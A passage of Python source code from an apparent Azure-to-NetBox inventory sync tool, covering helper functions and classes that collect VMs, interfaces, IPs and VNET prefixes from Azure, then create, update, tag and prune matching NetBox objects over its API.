tenant ID '%s' objects. Total \"\n \"execution time %s.\",\n settings.AZURE_TENANT_ID, (datetime.now() - start_time)\n )\n else:\n start_time = datetime.now()\n nb.verify_dependencies()\n nb.sync_objects(az_obj_type=\"vms\")\n nb.sync_objects(az_obj_type=\"vnets\")\n log.info(\n \"Completed sync with Azure tenant ID '%s'! Total \"\n \"execution time %s.\", settings.AZURE_TENANT_ID,\n (datetime.now() - start_time)\n )\n\ndef az_slug(text):\n \"\"\"\n Prefix string with 'azure-' and then format for NetBox.\n\n returns string\n \"\"\"\n return format_slug(\"azure-{}\".format(text))\n\n\ndef compare_dicts(dict1, dict2, dict1_name=\"d1\", dict2_name=\"d2\", path=\"\"):\n \"\"\"\n Compares the key value pairs of two dictionaries and match boolean.\n\n dict1 keys and values are compared against dict2. dict2 may have keys and\n values that dict1 does not care evaluate.\n dict1_name and dict2_name allow you to overwrite dictionary name for logs.\n \"\"\"\n # Setup paths to track key exploration. The path parameter is used to allow\n # recursive comparisions and track what's being compared.\n result = True\n for key in dict1.keys():\n dict1_path = \"{}{}[{}]\".format(dict1_name, path, key)\n dict2_path = \"{}{}[{}]\".format(dict2_name, path, key)\n if key not in dict2.keys():\n log.debug(\"%s not a valid key in %s.\", dict1_path, dict2_path)\n result = False\n elif isinstance(dict1[key], dict) and isinstance(dict2[key], dict):\n log.debug(\n \"%s and %s contain dictionary. Evaluating.\", dict1_path,\n dict2_path\n )\n result = compare_dicts(\n dict1[key], dict2[key], dict1_name, dict2_name,\n path=\"[{}]\".format(key)\n )\n elif isinstance(dict1[key], list) and isinstance(dict2[key], list):\n log.debug(\n \"%s and %s key '%s' contains list. Validating dict1 items \"\n \"exist in dict2.\", dict1_path, dict2_path, key\n )\n if not all([bool(item in dict2[key]) for item in dict1[key]]):\n log.debug(\n \"Mismatch: %s value is '%s' while %s value is '%s'.\",\n dict1_path, dict1[key], dict2_path, dict2[key]\n )\n result = False\n # Hack for NetBox v2.6.7 requiring integers for some values\n elif key in [\"status\", \"type\"]:\n if dict1[key] != dict2[key][\"value\"]:\n log.debug(\n \"Mismatch: %s value is '%s' while %s value is '%s'.\",\n dict1_path, dict1[key], dict2_path, dict2[key][\"value\"]\n )\n result = False\n elif dict1[key] != dict2[key]:\n log.debug(\n \"Mismatch: %s value is '%s' while %s value is '%s'.\",\n dict1_path, dict1[key], dict2_path, dict2[key]\n )\n result = False\n if result:\n log.debug(\"%s and %s values match.\", dict1_path, dict2_path)\n else:\n log.debug(\"%s and %s values do not match.\", dict1_path, dict2_path)\n return result\n log.debug(\"Final dictionary compare result: %s\", result)\n return result\n\ndef find_resource_name(resource_id, resource_type):\n \"\"\"\n Determine an Azure resource name by parsing its resource ID.\n\n resource_id = String of URI path for the resource ID\n resource_type = String of the Azure resource type\n returns string\n \"\"\"\n resource_id = resource_id.split(\"/\")\n resource_type_index = resource_id.index(resource_type)\n return resource_id[resource_type_index+1]\n\ndef format_slug(text):\n \"\"\"\n Format string to comply to NetBox slug acceptable pattern and max length.\n\n NetBox slug pattern: ^[-a-zA-Z0-9_]+$\n NetBox slug max length: 50 characters\n \"\"\"\n allowed_chars = (\n \"abcdefghijklmnopqrstuvxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\" # Alphabet\n \"01234567890\" # Numbers\n \"_-\" # Symbols\n )\n # Replace seperators with dash\n seperators = [\" \", \",\", \".\"]\n for sep in seperators:\n text = text.replace(sep, \"-\")\n # Strip unacceptable characters\n text = \"\".join([c for c in text if c in allowed_chars])\n # Enforce max length\n return truncate(text, max_len=50).lower()\n\ndef format_tag(tag):\n \"\"\"\n Format string to comply to NetBox tag format and max length.\n\n NetBox tag max length: 100 characters\n \"\"\"\n # If the tag presented is an IP address then no modifications are required\n try:\n ip_network(tag)\n except ValueError:\n # If an IP was not provided then assume fqdn\n tag = tag.split(\".\")[0]\n tag = truncate(tag, max_len=100)\n return tag\n\ndef prefix_template(prefix, description, tags):\n \"\"\"A template of the NetBox prefix object used by Azure resources.\"\"\"\n return {\n \"prefix\": prefix,\n \"description\": truncate(description, max_len=100),\n # VRF and tenant are initialized to be updated later\n \"vrf\": None,\n \"tenant\": None,\n \"status\": 1,\n \"tags\": tags,\n }\n\ndef truncate(text=\"\", max_len=50):\n \"\"\"Ensure a string complies to the maximum length specified.\"\"\"\n return text if len(text) < max_len else text[:max_len]\n\ndef verify_ip(ip_addr):\n \"\"\"\n Verify input is expected format and checks against allowed networks.\n\n Allowed networks can be defined in the settings IPV4_ALLOWED and\n IPV6_ALLOWED variables.\n \"\"\"\n result = False\n try:\n log.debug(\n \"Validating IP '%s' is properly formatted and within allowed \"\n \"networks.\",\n ip_addr\n )\n # Strict is set to false to allow host address checks\n version = ip_network(ip_addr, strict=False).version\n global_nets = settings.IPV4_ALLOWED if version == 4 \\\n else settings.IPV6_ALLOWED\n # Check whether the network is within the global allowed networks\n log.debug(\n \"Checking whether IP address '%s' is within %s.\", ip_addr,\n global_nets\n )\n net_matches = [\n ip_network(ip_addr, strict=False).overlaps(ip_network(net))\n for net in global_nets\n ]\n result = any(net_matches)\n except ValueError as err:\n log.debug(\"Validation of %s failed. Received error: %s\", ip_addr, err)\n log.debug(\"IP '%s' validation returned a %s status.\", ip_addr, result)\n return result\n\nclass AzureHandler:\n \"\"\"Handles Azure session management and object collection.\"\"\"\n def __init__(self):\n self.credentials = ServicePrincipalCredentials(\n client_id=settings.AZURE_SP_ID,\n secret=settings.AZURE_SP_KEY,\n tenant=settings.AZURE_TENANT_ID,\n )\n # Initialize clients for use across methods\n self.compute_client = None\n self.network_client = None\n self.subscription_client = SubscriptionClient(self.credentials)\n self.tags = [\"Synced\", \"Azure\"]\n\n def _get_skus(self):\n \"\"\"\n Provide Virtual Machine SKUs available for the provided subscription.\n\n returns dict\n \"\"\"\n # Collect available SKUs for subscription to compare against\n # Unfortunately the resource list is deprecated and this was\n # the documented method for determining memory and vCPU\n # Please feel free to help me find a better way!\n log.debug(\"Collecting VM SKUs available to the subscription.\")\n sub_vm_skus = {}\n for sku in self.compute_client.resource_skus.list():\n if sku.resource_type == \"virtualMachines\":\n sub_vm_skus[sku.name] = {}\n for cap in sku.capabilities:\n sub_vm_skus[sku.name][cap.name] = cap.value\n log.debug(\"Collected details of %s available VM SKUs.\", len(sub_vm_skus))\n return sub_vm_skus\n\n def _get_storage(self, vm):\n \"\"\"\n Get storage information for the provided virtual machine and return sum.\n\n vm = Azure virtual machine model\n returns integer of storage space\n \"\"\"\n # OS Disk\n log.debug(\"Collecting size of VM '%s' OS disk.\", vm.name)\n os_disk = vm.storage_profile.os_disk.managed_disk.id\n os_disk_rg = find_resource_name(\n resource_id=os_disk,\n resource_type=\"resourceGroups\"\n )\n os_disk_id = find_resource_name(\n resource_id=os_disk,\n resource_type=\"disks\"\n )\n storage_size_sum = self.compute_client.disks.get(\n resource_group_name=os_disk_rg,\n disk_name=os_disk_id\n ).disk_size_gb\n # Data Disks\n log.debug(\"Collecting size of VM '%s' data disks.\", vm.name)\n for data_disk in vm.storage_profile.data_disks:\n data_disk_size = data_disk.disk_size_gb\n if data_disk_size is not None:\n storage_size_sum += data_disk_size\n return storage_size_sum\n\n def _get_network_config(self, vm):\n \"\"\"\n Get network configuration for the provided virtual machine.\n\n vm = Azure virtual machine model\n returns dictionary containing nics and their configuration\n \"\"\"\n results = {\"virtual_interfaces\": [], \"ip_addresses\": []}\n vm_nics = vm.network_profile.network_interfaces\n for nic in vm_nics:\n nic_rg = find_resource_name(\n resource_id=nic.id,\n resource_type=\"resourceGroups\"\n )\n nic_name = find_resource_name(\n resource_id=nic.id,\n resource_type=\"networkInterfaces\"\n )\n # Collect IP information for NIC\n nic_conf = self.network_client.network_interfaces.get(\n resource_group_name=nic_rg,\n network_interface_name=nic_name\n )\n log.debug(\"Collecting VM '%s' VNIC '%s' data.\", vm.name, nic_name)\n nic_mac = nic_conf.mac_address.replace(\"-\", \":\")\n results[\"virtual_interfaces\"].append(\n {\n \"virtual_machine\": {\"name\": truncate(vm.name, max_len=64)},\n \"name\": truncate(nic_name, max_len=64),\n \"type\": 0, # 0 = Virtual\n \"enabled\": True,\n \"mac_address\": nic_mac.upper(),\n \"tags\": self.tags\n })\n # Each NIC may have multiple IP configs\n for ip in nic_conf.ip_configurations:\n priv_ip_addr = ip.private_ip_address\n subnet = ip.subnet.id\n subnet_name = find_resource_name(\n resource_id=subnet,\n resource_type=\"subnets\"\n )\n subnet_rg = find_resource_name(\n resource_id=subnet,\n resource_type=\"resourceGroups\"\n )\n subnet_vnet = find_resource_name(\n resource_id=subnet,\n resource_type=\"virtualNetworks\"\n )\n # Collect Subnet info\n subnet_info = self.network_client.subnets.get(\n resource_group_name=subnet_rg,\n virtual_network_name=subnet_vnet,\n subnet_name=subnet_name,\n )\n subnet_prefix = subnet_info.address_prefix\n subnet_cidr = subnet_prefix.split(\"/\")[-1]\n priv_ip_addr = \"{}/{}\".format(\n priv_ip_addr, subnet_cidr\n )\n # Collect Public IP config\n pub_ip_addr = None\n if hasattr(ip.public_ip_address, \"id\"):\n pub_ip_id = ip.public_ip_address.id\n pub_ip_rg = find_resource_name(\n resource_id=pub_ip_id,\n resource_type=\"resourceGroups\"\n )\n pub_ip_name = find_resource_name(\n resource_id=pub_ip_id,\n resource_type=\"publicIPAddresses\"\n )\n pub_ip = self.network_client.public_ip_addresses.get(\n resource_group_name=pub_ip_rg,\n public_ip_address_name=pub_ip_name\n )\n if pub_ip.public_ip_prefix is not None:\n pub_ip_addr = \"{}/{}\".format(\n pub_ip.ip_address,\n pub_ip.public_ip_prefix.split(\"/\")[-1]\n )\n else:\n pub_ip_addr = \"{}/32\".format(pub_ip.ip_address)\n # Create records for all IPs found\n ips = [\n ip for ip in [priv_ip_addr, pub_ip_addr] if ip is not None\n ]\n for ip_addr in ips:\n results[\"ip_addresses\"].append(\n {\n \"address\": ip_addr,\n \"vrf\": None,\n \"tenant\": None,\n \"interface\": {\n \"virtual_machine\": {\n \"name\": truncate(vm.name, max_len=64)\n },\n \"name\": truncate(nic_name, max_len=64),\n },\n \"tags\": self.tags,\n })\n return results\n\n def get_subscriptions(self):\n \"\"\"\n Get Azure subscriptions available under the provided tenant ID.\n\n returns dict of subscription id key and name value pair\n \"\"\"\n log.debug(\"Collecting subscriptions available to Azure tenant.\")\n subscriptions = {}\n for sub in self.subscription_client.subscriptions.list():\n subscriptions[sub.subscription_id] = sub.display_name\n return subscriptions\n\n def _get_regions(self, subscription_id):\n \"\"\"\n Get a list of regions available for the provided subscription ID.\n\n returns dict of regions\n \"\"\"\n log.debug(\n \"Collecting regions available to subscription ID '%s'.\",\n subscription_id\n )\n results = {}\n regions = self.subscription_client.subscriptions.list_locations(\n subscription_id=subscription_id\n )\n for region in regions:\n results[region.name] = {\n \"description\": \"Microsoft Azure {}\".format(region.display_name),\n }\n return results\n\n def get_vnets(self):\n \"\"\"Get Azure virtual networks for the provided subscription.\"\"\"\n results = {\"prefixes\": []}\n subscriptions = self.get_subscriptions()\n for sub_id in subscriptions:\n log.info(\"Accessing Azure Subscription ID '%s'.\", sub_id)\n self.network_client = NetworkManagementClient(\n self.credentials, sub_id\n )\n log.info(\"Collecting VNETs for Azure Subscription ID '%s'.\", sub_id)\n try:\n for vnet in self.network_client.virtual_networks.list_all():\n log.debug(\"Collecting VNET '%s' address spaces.\", vnet.name)\n for prefix in vnet.address_space.address_prefixes:\n results[\"prefixes\"].append(prefix_template(\n prefix=prefix,\n description=truncate(vnet.name, max_len=100),\n tags=self.tags\n ))\n for subnet in vnet.subnets:\n if subnet.address_prefixes is not None:\n for prefix in subnet.address_prefixes:\n results[\"prefixes\"].append(prefix_template(\n prefix=prefix.address_prefix,\n description=truncate(vnet.name, max_len=100),\n tags=self.tags\n ))\n else:\n results[\"prefixes\"].append(prefix_template(\n prefix=subnet.address_prefix,\n description=truncate(subnet.name, max_len=100),\n tags=self.tags\n ))\n except azure_exceptions.CloudError as err:\n log.warning(\n \"Unable to collect data from subscription ID '%s'. \"\n \"Received error '%s: %s'\", sub_id, err.error.error,\n err.message\n )\n return results\n\n def get_vms(self):\n \"\"\"Get Azure Virtual Machine information.\"\"\"\n # Initialize expected result keys\n results = {\n \"clusters\": [],\n \"virtual_machines\": [],\n \"virtual_interfaces\": [],\n \"ip_addresses\": []\n }\n used_regions = []\n subscriptions = self.get_subscriptions()\n for sub_id in subscriptions:\n log.info(\"Accessing Azure Subscription ID '%s'.\", sub_id)\n sub_vm_skus = {} # Store available subscription VM SKU details\n self.network_client = NetworkManagementClient(\n self.credentials, sub_id\n )\n self.compute_client = ComputeManagementClient(\n self.credentials, sub_id\n )\n regions = self._get_regions(sub_id)\n # Some subscriptions are not readable so catch and move on\n try:\n for vm in self.compute_client.virtual_machines.list_all():\n # We check whether the subscription SKUs have been collected\n # only if the subscription has VMs. This saves lots of time.\n if not sub_vm_skus:\n sub_vm_skus = self._get_skus()\n # Virtual Machine info\n log.info(\n \"Collecting information for Azure VM '%s'.\",\n vm.name\n )\n # Collect all regions used by VMs\n if vm.location not in used_regions:\n log.debug(\n \"VM region '%s' added to used regions.\", vm.location\n )\n used_regions.append(vm.location)\n vm_size = vm.hardware_profile.vm_size\n vm_mem = int(\n float(sub_vm_skus[vm_size][\"MemoryGB\"]) * 1024.0\n )\n os_type = vm.storage_profile.os_disk.os_type.value\n if os_type is not None:\n os_type = {\"name\": os_type}\n storage_size = self._get_storage(vm)\n results[\"virtual_machines\"].append(\n {\n \"name\": truncate(vm.name, max_len=64),\n \"status\": 1,\n \"cluster\": {\n \"name\": regions[vm.location][\"description\"]\n },\n \"role\": {\"name\": \"Server\"},\n \"platform\": os_type,\n \"vcpus\": int(sub_vm_skus[vm_size][\"vCPUs\"]),\n \"memory\": vm_mem,\n \"disk\": storage_size,\n \"tags\": self.tags,\n })\n # Network configuration\n network_objects = self._get_network_config(vm)\n for key in network_objects:\n results[key].extend(network_objects[key])\n except azure_exceptions.CloudError as err:\n log.warning(\n \"Unable to collect data from subscription ID '%s'. \"\n \"Received error '%s: %s'\", sub_id, err.error.error,\n err.message\n )\n # Clusters are done after virtual machines to ensure we only build\n # relevant regions\n for region in used_regions:\n # We check to make sure the results don't already contain the\n # site we want to add\n if not any(\n cluster[\"name\"] == regions[region][\"description\"]\n for cluster in results[\"clusters\"]):\n results[\"clusters\"].append(\n {\n \"name\": regions[region][\"description\"],\n \"type\": {\"name\": \"Public Cloud\"},\n \"group\": {\"name\": \"Microsoft Azure\"},\n \"tags\": self.tags,\n })\n return results\n\nclass NetBoxHandler:\n \"\"\"Handles NetBox connection state and interaction with the API\"\"\"\n def __init__(self):\n self.header = {\"Authorization\": \"Token {}\".format(settings.NB_API_KEY)}\n self.nb_api_url = \"http{}://{}{}/api/\".format(\n (\"s\" if not settings.NB_DISABLE_TLS else \"\"), settings.NB_FQDN,\n (\":{}\".format(settings.NB_PORT) if settings.NB_PORT != 443 else \"\")\n )\n self.nb_session = None\n # NetBox object type relationships when working in the API\n self.obj_map = {\n \"cluster_groups\": {\n \"api_app\": \"virtualization\",\n \"api_model\": \"cluster-groups\",\n \"key\": \"name\",\n \"prune\": False,\n },\n \"cluster_types\": {\n \"api_app\": \"virtualization\",\n \"api_model\": \"cluster-types\",\n \"key\": \"name\",\n \"prune\": False,\n },\n \"clusters\": {\n \"api_app\": \"virtualization\",\n \"api_model\": \"clusters\",\n \"key\": \"name\",\n \"prune\": True,\n \"prune_pref\": 2\n },\n \"device_roles\": {\n \"api_app\": \"dcim\",\n \"api_model\": \"device-roles\",\n \"key\": \"name\",\n \"prune\": False,\n },\n \"device_types\": {\n \"api_app\": \"dcim\",\n \"api_model\": \"device-types\",\n \"key\": \"model\",\n \"prune\": True,\n \"prune_pref\": 3\n },\n \"devices\": {\n \"api_app\": \"dcim\",\n \"api_model\": \"devices\",\n \"key\": \"name\",\n \"prune\": True,\n \"prune_pref\": 4\n },\n \"interfaces\": {\n \"api_app\": \"dcim\",\n \"api_model\": \"interfaces\",\n \"key\": \"name\",\n \"prune\": True,\n \"prune_pref\": 5\n },\n \"ip_addresses\": {\n \"api_app\": \"ipam\",\n \"api_model\": \"ip-addresses\",\n \"key\": \"address\",\n \"prune\": True,\n \"prune_pref\": 9\n },\n \"manufacturers\": {\n \"api_app\": \"dcim\",\n \"api_model\": \"manufacturers\",\n \"key\": \"name\",\n \"prune\": False,\n },\n \"platforms\": {\n \"api_app\": \"dcim\",\n \"api_model\": \"platforms\",\n \"key\": \"name\",\n \"prune\": False,\n },\n \"prefixes\": {\n \"api_app\": \"ipam\",\n \"api_model\": \"prefixes\",\n \"key\": \"prefix\",\n \"prune\": True,\n \"prune_pref\": 8\n },\n \"sites\": {\n \"api_app\": \"dcim\",\n \"api_model\": \"sites\",\n \"key\": \"name\",\n \"prune\": True,\n \"prune_pref\": 1\n },\n \"tags\": {\n \"api_app\": \"extras\",\n \"api_model\": \"tags\",\n \"key\": \"name\",\n \"prune\": False,\n },\n \"virtual_machines\": {\n \"api_app\": \"virtualization\",\n \"api_model\": \"virtual-machines\",\n \"key\": \"name\",\n \"prune\": True,\n \"prune_pref\": 6\n },\n \"virtual_interfaces\": {\n \"api_app\": \"virtualization\",\n \"api_model\": \"interfaces\",\n \"key\": \"name\",\n \"prune\": True,\n \"prune_pref\": 7\n },\n }\n\n def request(self, req_type, nb_obj_type, data=None, query=None, nb_id=None):\n \"\"\"\n HTTP requests and exception handler for NetBox\n\n req_type: HTTP Method\n nb_obj_type: NetBox object type, must match keys in self.obj_map\n data: Dictionary to be passed as request body.\n query: String used to filter results when using GET method\n nb_id: Integer used when working with a single NetBox object\n \"\"\"\n # If an existing session is not already found then create it\n # The goal here is session re-use without TCP handshake on every request\n if not self.nb_session:\n self.nb_session = requests.Session()\n self.nb_session.headers.update(self.header)\n result = None\n # Generate URL\n url = \"{}{}/{}/{}{}\".format(\n self.nb_api_url,\n self.obj_map[nb_obj_type][\"api_app\"], # App that model falls under\n self.obj_map[nb_obj_type][\"api_model\"], # Data model\n query if query else \"\",\n \"{}/\".format(nb_id) if nb_id else \"\"\n )\n log.debug(\"Sending %s to '%s'\", req_type.upper(), url)\n req = getattr(self.nb_session, req_type)(\n url, json=data, timeout=10, verify=(not settings.NB_INSECURE_TLS)\n )\n # Parse status\n if req.status_code == 200:\n log.debug(\n \"NetBox %s request OK; returned %s status.\", req_type.upper(),\n req.status_code\n )\n result = req.json()\n if req_type == \"get\":\n # NetBox returns 50 results by default, this ensures all results\n # are bundled together\n while req.json()[\"next\"] is not None:\n url = req.json()[\"next\"]\n log.debug(\n \"NetBox returned more than 50 objects. Sending %s to \"\n \"%s for additional objects.\", req_type.upper(), url\n )\n req = getattr(self.nb_session, req_type)(url, timeout=10)\n result[\"results\"] += req.json()[\"results\"]\n elif req.status_code in [201, 204]:\n log.info(\n \"NetBox successfully %s %s object.\",\n \"created\" if req.status_code == 201 else \"deleted\",\n nb_obj_type,\n )\n elif req.status_code == 400:\n if req_type == \"post\":\n log.warning(\n \"NetBox failed to create %s object. A duplicate record may \"\n \"exist or the data sent is not acceptable.\", nb_obj_type\n )\n log.debug(\n \"NetBox %s status reason: %s\", req.status_code, req.json()\n )\n elif req_type == \"put\":\n log.warning(\n \"NetBox failed to modify %s object with status %s. The \"\n \"data sent may not be acceptable.\", nb_obj_type,\n req.status_code\n )\n log.debug(\n \"NetBox %s status reason: %s\", req.status_code, req.json()\n )\n else:\n raise SystemExit(\n log.critical(\n \"Well this in unexpected. Please report this. \"\n \"%s request received %s status with body '%s' and \"\n \"response '%s'.\",\n req_type.upper(), req.status_code, data, req.json()\n )\n )\n log.debug(\"Unaccepted request data: %s\", data)\n elif req.status_code == 409 and req_type == \"delete\":\n log.warning(\n \"Received %s status when attemping to delete NetBox object \"\n \"(ID: %s). Please check the object dependencies.\",\n req.status_code, nb_id\n )\n log.debug(\"NetBox %s status body: %s\", req.status_code, req.json())\n else:\n raise SystemExit(\n log.critical(\n \"Well this in unexpected. Please report this. \"\n \"%s request received %s status with body '%s' and response \"\n \"'%s'.\",\n req_type.upper(), req.status_code, data, req.json()\n )\n )\n return result\n\n def obj_exists(self, nb_obj_type, az_data):\n \"\"\"\n Checks whether a NetBox object exists and matches the Azure object.\n\n If object does not exist or does not match the Azure object it will\n be created or updated.\n\n nb_obj_type: String NetBox object type to query for and compare against\n az_data: Dictionary of Azure object key value pairs pre-formatted for\n NetBox\n \"\"\"\n # NetBox object types do not have a standard key to search and filter\n # them by therefore we look up the appropriate key\n query_key = self.obj_map[nb_obj_type][\"key\"]\n # Create a query specific to the device parent/child relationship when\n # working with interfaces\n if nb_obj_type == \"interfaces\":\n query = \"?device={}&{}={}\".format(\n az_data[\"device\"][\"name\"], query_key, az_data[query_key]\n )\n elif nb_obj_type == \"virtual_interfaces\":\n query = \"?virtual_machine={}&{}={}\".format(\n az_data[\"virtual_machine\"][\"name\"], query_key,\n az_data[query_key]\n )\n else:\n query = \"?{}={}\".format(query_key, az_data[query_key])\n req = self.request(\n req_type=\"get\", nb_obj_type=nb_obj_type,\n query=query\n )\n # Users have the option to avoid updating prefixes that have already\n # been created by other means.\n if req[\"count\"] == 1 and nb_obj_type == \"prefixes\" \\\n and \"Azure\" not in req[\"results\"][0][\"tags\"] \\\n and not settings.NB_OVERWRITE_PREFIXES:\n log.info(\n \"NetBox %s object '%s' already exists with no 'Azure' tag and \"\n \"the overwrite prefixes setting is currently False. Skipping \"\n \"update.\", nb_obj_type, az_data[query_key]\n )\n # A single matching object is found so we compare its values to the new\n # object\n elif req[\"count\"] == 1:\n log.debug(\n \"NetBox %s object '%s' already exists. Comparing values.\",\n nb_obj_type, az_data[query_key]\n )\n nb_data = req[\"results\"][0]\n # Objects that have been previously tagged as orphaned but then\n # reappear in Azure need to be stripped of their orphaned status\n if \"tags\" in az_data and \"Orphaned\" in nb_data[\"tags\"]:\n log.info(\n \"NetBox %s object '%s' is currently marked as orphaned \"\n \"but has reappeared in Azure. Updating NetBox.\",\n nb_obj_type, az_data[query_key]\n )\n self.request(\n req_type=\"put\", nb_obj_type=nb_obj_type, data=az_data,\n nb_id=nb_data[\"id\"]\n )\n elif compare_dicts(\n az_data, nb_data, dict1_name=\"az_data\",\n dict2_name=\"nb_data\"):\n log.info(\n \"NetBox %s object '%s' match current values. Moving on.\",\n nb_obj_type, az_data[query_key]\n )\n else:\n log.info(\n \"NetBox %s object '%s' do not match current values.\",\n nb_obj_type, az_data[query_key]\n )\n if \"tags\" in az_data:\n log.debug(\"Merging tags between Azure and NetBox object.\")\n az_data[\"tags\"] = list(\n set(az_data[\"tags\"] + nb_data[\"tags\"])\n )\n self.request(\n req_type=\"put\", nb_obj_type=nb_obj_type, data=az_data,\n nb_id=nb_data[\"id\"]\n )\n elif req[\"count\"] > 1:\n log.warning(\n \"Search for NetBox %s object '%s' returned %s results but \"\n \"should have only returned 1. Please manually review and \"\n \"report this if the data is accurate. Skipping for safety.\",\n nb_obj_type, az_data[query_key], req[\"count\"]\n )\n else:\n log.info(\n \"Netbox %s '%s' object not found. Requesting creation.\",\n nb_obj_type,\n az_data[query_key],\n )\n self.request(\n req_type=\"post\", nb_obj_type=nb_obj_type, data=az_data\n )\n\n def sync_objects(self, az_obj_type):\n \"\"\"\n Collect resources of type from Azure and syncs them to NetBox.\n\n Some NB object types do not support tags so they will be a one-way sync\n meaning orphaned objects will not be removed from NetBox.\n \"\"\"\n # Collect data from Azure\n log.info(\n \"Initiated sync of Azure %s objects to NetBox.\",\n az_obj_type[:-1]\n )\n # Dynamically accept any of the AzureHandler class get_ functions\n az_objects = getattr(AzureHandler(), \"get_{}\".format(az_obj_type))()\n nb_obj_types = list(az_objects.keys())\n for nb_obj_type in nb_obj_types:\n log.info(\n \"Starting sync of %s Azure %s object%s to NetBox %s \"\n \"object%s.\",\n len(az_objects[nb_obj_type]),\n az_obj_type,\n \"s\" if len(az_objects[nb_obj_type]) != 1 else \"\",\n nb_obj_type,\n \"s\" if len(az_objects[nb_obj_type]) != 1 else \"\",\n )\n for obj in az_objects[nb_obj_type]:\n # Check to ensure IP addresses pass all checks before syncing\n # to NetBox\n if nb_obj_type in [\"ip_addresses\", \"prefixes\"]:\n ip_addr = (\n obj[\"address\"] if nb_obj_type == \"ip_addresses\"\n else obj[\"prefix\"] if nb_obj_type == \"prefixes\" else \"\"\n )\n if verify_ip(ip_addr):\n log.debug(\n \"IP %s has passed necessary pre-checks.\",\n ip_addr\n )\n # Search for parent prefix to assign VRF and tenancy\n prefix = self.search_prefix(ip_addr)\n # Update placeholder values with matched values\n obj[\"vrf\"] = prefix[\"vrf\"]\n obj[\"tenant\"] = prefix[\"tenant\"]\n else:\n log.debug(\n \"IP %s has failed necessary pre-checks. Skipping \"\n \"sync to NetBox.\", ip_addr,\n )\n continue\n self.obj_exists(nb_obj_type=nb_obj_type, az_data=obj)\n log.info(\n \"Finished sync of %s Azure %s object%s to NetBox %s \"\n \"object%s.\",\n len(az_objects[nb_obj_type]),\n az_obj_type,\n \"s\" if len(az_objects[nb_obj_type]) != 1 else \"\",\n nb_obj_type,\n \"s\" if len(az_objects[nb_obj_type]) != 1 else \"\",\n )\n # Send Azure objects to the pruner\n if settings.NB_PRUNE_ENABLED:\n self.prune_objects(az_objects, az_obj_type)\n\n def prune_objects(self, az_objects, az_obj_type):\n \"\"\"\n Collects NetBox objects and checks if they still exist in Azure.\n\n If NetBox objects are not found in the supplied az_objects data then\n they will go through a pruning process.\n\n az_objects: Dictionary of Azure object types and list of their objects\n az_obj_type: The parent object type called during the sync. This is\n used to determine whether special filtering needs to be applied.\n \"\"\"\n # Determine which of our NetBox objects types support pruning\n nb_obj_types = [t for t in az_objects if self.obj_map[t][\"prune\"]]\n # Sort NetBox object types by pruning priority. This ensures\n # we do not have issues with deleting objects with dependencies.\n nb_obj_types = sorted(\n nb_obj_types, key=lambda t: self.obj_map[t][\"prune_pref\"],\n reverse=True\n )\n for nb_obj_type in nb_obj_types:\n log.info(\n \"Comparing existing NetBox %s objects to current Azure \"\n \"objects for pruning eligibility.\", nb_obj_type\n )\n nb_objects = self.request(\n req_type=\"get\", nb_obj_type=nb_obj_type,\n # Tags need to always be searched by slug\n query=\"?tag={}\".format(format_slug(\"Azure\"))\n )[\"results\"]\n # Issue 33: As of NetBox v2.6.11 it is not possible to filter\n # virtual interfaces by tag. Therefore we filter post collection.\n if az_obj_type == \"vms\" and \\\n nb_obj_type == \"virtual_interfaces\":\n nb_objects = [\n obj for obj in nb_objects\n if \"Azure\" in obj[\"tags\"]\n ]\n log.debug(\n \"Found %s virtual interfaces with tag 'Azure'.\",\n len(nb_objects)\n )\n elif az_obj_type == \"vms\" and \\\n nb_obj_type == \"ip_addresses\":\n nb_objects = [\n obj for obj in nb_objects\n if obj[\"interface\"][\"virtual_machine\"] is not None\n ]\n # NetBox object types do not have a standard key to search and\n # filter them by therefore we look up the appropriate key\n query_key = self.obj_map[nb_obj_type][\"key\"]\n az_obj_values = [obj[query_key] for obj in az_objects[nb_obj_type]]\n orphans = [\n obj for obj in nb_objects if obj[query_key] not in az_obj_values\n ]\n log.info(\n \"Comparison completed. %s %s orphaned NetBox object%s did not \"\n \"match.\",\n len(orphans), nb_obj_type, \"s\" if len(orphans) != 1 else \"\"\n )\n log.debug(\"The following objects did not match: %s\", orphans)\n # Pruned items are checked against the prune timer\n # All pruned items are first tagged so it is clear why they were\n # deleted, and then those items which are greater than the max age\n # will be deleted permanently\n for orphan in orphans:\n log.info(\n \"Processing orphaned NetBox %s '%s' object.\",\n nb_obj_type, orphan[query_key]\n )\n if \"Orphaned\" not in orphan[\"tags\"]:\n log.info(\n \"No tag found. Adding 'Orphaned' tag to %s '%s' \"\n \"object.\",\n nb_obj_type, orphan[query_key]\n )\n tags = {\n \"tags\": [\"Synced\", \"Azure\", \"Orphaned\"]\n }\n self.request(\n req_type=\"patch\", nb_obj_type=nb_obj_type,\n nb_id=orphan[\"id\"],\n data=tags\n )\n # Check if the orphan has gone past the max prune timer and\n # needs to be deleted\n # Dates are in YY, MM, DD format\n current_date = date.today()\n # Some objects do not have a last_updated field so we must\n # handle that gracefully and send for deletion\n del_obj = False\n try:\n modified_date = date(\n int(orphan[\"last_updated\"][:4]), # Year\n int(orphan[\"last_updated\"][5:7]), # Month\n int(orphan[\"last_updated\"][8:10]) # Day\n )\n # Calculated timedelta then converts it to the days integer\n days_orphaned = (current_date - modified_date).days\n if days_orphaned >= settings.NB_PRUNE_DELAY_DAYS:\n log.info(\n \"The %s '%s' object has exceeded the %s day max \"\n \"for orphaned objects. Sending it for deletion.\",\n nb_obj_type, orphan[query_key],\n settings.NB_PRUNE_DELAY_DAYS\n )\n del_obj = True\n else:\n log.info(\n \"The %s '%s' object has been orphaned for %s of %s \"\n \"max days. Proceeding to next object.\",\n nb_obj_type, orphan[query_key], days_orphaned,\n settings.NB_PRUNE_DELAY_DAYS\n )\n except KeyError as err:\n log.debug(\n \"The %s '%s' object does not have a %s \"\n \"field. Sending it for deletion.\",\n nb_obj_type, orphan[query_key], err\n )\n del_obj = True\n if del_obj:\n self.request(\n req_type=\"delete\", nb_obj_type=nb_obj_type,\n nb_id=orphan[\"id\"],\n )\n\n def search_prefix(self, ip_addr):\n \"\"\"\n Queries Netbox for the parent prefix of any supplied IP address.\n\n Returns dictionary of VRF and tenant values.\n \"\"\"\n result = {\"tenant\": None, \"vrf\": None}\n query = \"?contains={}\".format(ip_addr)\n try:\n prefix_obj = self.request(\n req_type=\"get\", nb_obj_type=\"prefixes\", query=query\n )[\"results\"][-1] # -1 used to choose the most specific result\n prefix = prefix_obj[\"prefix\"]\n for key in result:\n # Ensure the data returned was not null.\n try:\n result[key] = {\"name\": prefix_obj[key][\"name\"]}\n 